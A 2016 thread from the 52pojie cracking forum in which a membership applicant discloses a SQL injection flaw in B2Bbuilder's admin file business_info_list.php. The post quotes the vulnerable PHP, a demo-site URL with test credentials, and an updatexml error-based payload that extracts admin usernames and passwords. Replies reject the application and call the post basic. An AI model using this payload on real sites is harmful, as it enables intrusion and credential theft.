吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4273|回复: 12
收起左侧

[会员申请] 申 请 I D : a630935072

[复制链接]
吾爱游客  发表于 2016-6-8 15:52
1、申 请 I D :   a630935072
2、个人邮箱:630935072@qq.com
3、原创技术文章:


好几年没上论坛了 以前的号没了 现在申请一个吧,记得那时候不用注册码的
既然要注册码了 就发表一个吧 下面文章开始吧 废话不多说

B2Bbuilder网上商城通用注入漏洞

漏洞目录: module\company\admin\business_info_list.php

<?php

$status=array('-1'=>lang_show('notpass'),'0'=>lang_show('wpass'),'1'=>lang_show('auditpass'));

if(isset($_GET['step']))

{

    if($_GET['step']=="del")

    {

       $db->query("delete from ".CERTIFICATION." where id='$_GET[deid]'");

       $sql="update ".COMPANY." set certification='0' wherecompany_id in (select company_id from ".CERTIFICATION." where id='$_GET[deid]')";

       $db->query($sql);

    }

}

if(isset($_POST['del']))

{

    $ids=implode(",",$_POST['del']);

    $sql="update ".CERTIFICATION." set statu=1 where id in($ids)";

    $db->query($sql);



    $sql="update ".COMPANY." set certification='1' wherecompany_id in (select company_id from ".CERTIFICATION." where id in ($ids))";

    $db->query($sql);

}

?>


以上为文件源码
我们可以看到源码中 del未能过滤导致造成sql注入


那么我们怎么来操作呢?

我们就可以直接构造注入语句了

http://democn.b2b-builder.com
账号密码 test test

构造url
http://democn.b2b-builder.com/main.php?m=company&s=admin/business_info_list
post数据包为
del[]=1)or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,password) fromhy_admin))),0) %23&updateID=11&cc=1111



我们来观看下图 结果:

漏洞证明

漏洞证明



发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Hmily 发表于 2016-6-8 15:57
抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。
wsd10086 发表于 2016-6-8 16:14
虚幻魔王 发表于 2016-6-8 16:28
52什么时候抢乌云和360的生意了?这不科学啊。注册码好像官方有出啊,楼主玩这个的,不会连几十元都不舍得出吧。
小值是个小白 发表于 2016-6-8 16:35
论坛就有直接赞助的注册码啊!
11111111 发表于 2016-6-8 16:38
这不应该是乌云干的事吗
☆★☆☆ 发表于 2016-6-8 16:43
怎么最近这么多申请ID的,多少写点有技术含量的东西,这么简单的东西拿出来即什么作用,也没什么好学习的,多少破个高级点的软件也行啊
珍珠先生 发表于 2016-6-8 17:07
高冷的不行,然后被H大瞬间打脸
wsbz112 发表于 2016-6-8 17:13
不错,再接再厉~~~
nanzhu 发表于 2016-6-8 17:16
貌似更应该去乌云。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-15 21:41

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表